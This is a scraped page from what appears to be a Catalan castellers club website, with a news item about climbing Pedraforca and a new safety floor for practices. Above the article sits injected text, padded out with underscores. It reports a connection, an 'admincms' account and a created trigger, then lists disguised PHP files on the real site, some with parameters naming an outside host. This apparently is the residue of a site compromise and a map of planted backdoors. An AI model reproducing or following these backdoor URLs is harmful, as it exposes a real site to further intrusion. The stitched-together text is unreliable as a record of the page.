Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ssh2-private-ajax-response-ajax-response-stream-ajax-response-cron-meta-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/theme-editor-ajax-core-meta-ajax-response-meta-ajax-ajax.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/ajax-actions-wp-cron-stream-wp.php https://castellersdeberga.cat/wp-content/plugins/the-events-calendar/the-events-calendar-meta-ajax-response-stream.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/woocommerce-ajax-response-core-meta-ajax-response-core-private-core-ajax-response-ajax-response.php https://castellersdeberga.cat/wp-includes/widgets/class-wp-widget-search-stream-stream-ajax.php https://castellersdeberga.cat/wp-includes/rss-functions-ajax-meta-private.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Pedraforca i terra atenuant
 

Pedraforca i terra atenuant


Pedraforca i terra atenuantDiumenge 2 de setembre, unes 150 persones entre castellers i acompanyants van pujar al Pedraforca. A l’enforcadura, els Castellers de Berga vam fer un pilar per cada infant que havia aconseguit arribar a dalt. Un centenar de membres de la colla, van arrodonir la jornada amb un dinar en una casa de Maçaners.
Es va pujar al Pedraforca per la ruta de Gósol, la que presenta menys exigència tècnica tot i que la pujada és molt pronunciada i s’han de superar 1000 metres de desnivell positiu en 4 km.
Reportatge de Televisió del Berguedà:

A l’assaig del dimarts 4 de setembre, es va estrenar el terra atenuant. Aquest terra no és obligatori però és recomanat per la Coordinadora de Colles Castelleres de Catalunya, fruit de diversos estudis. El terra augmenta la seguretat en els assajos i s’ha aconseguit comprar gràcies a socis i col.laboradors de la campanya Aquí fem pinya 2012.